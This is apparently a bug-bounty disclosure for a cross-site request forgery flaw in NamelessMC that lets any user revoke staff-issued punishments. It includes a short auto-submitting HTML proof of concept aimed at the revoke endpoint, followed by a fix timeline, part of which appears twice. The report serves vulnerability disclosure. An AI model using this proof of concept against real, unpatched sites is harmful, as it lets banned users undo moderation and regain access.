Cross-Site Request Forgery (CSRF) in namelessmc/nameless

Valid

Reported on

Sep 24th 2021

Description

With this CSRF any user is able to remove any punishment on any user made by the staff.

Proof of Concept

After you log in, open this POC.html in a browser. This will remove any punishment that's specified in the POC.

<body>
<script>history.pushState('', '', '/')</script>
<form action="https://example.com/panel/users/punishments/?user=2&do=revoke&id=1">
    <input type="submit" value="Submit request" />
</form>
<script>
  document.forms[0].submit();
</script>
</body>
</html>

This specific POC will remove the 1st punishment from the userid 2.

Impact

This vulnerability is capable of allowing banned users to re access the site.

Occurrences

users_punishments.php L28-L88

We have contacted a member of the namelessmc/nameless team and are waiting to hear back 2 years ago

hexdubbers modified the report

2 years ago

Sam validated this vulnerability 2 years ago

hexdubbers has been awarded the disclosure bounty

The fix bounty is now up for grabs

Sam marked this as fixed with commit e24722 2 years ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

users_punishments.php#L28-L88 has been validated

to join this conversation

We have contacted a member of the namelessmc/nameless team and are waiting to hear back 2 years ago

hexdubbers modified the report

2 years ago

Sam validated this vulnerability 2 years ago

hexdubbers has been awarded the disclosure bounty

The fix bounty is now up for grabs

Sam marked this as fixed with commit e24722 2 years ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

users_punishments.php#L28-L88 has been validated

to join this conversation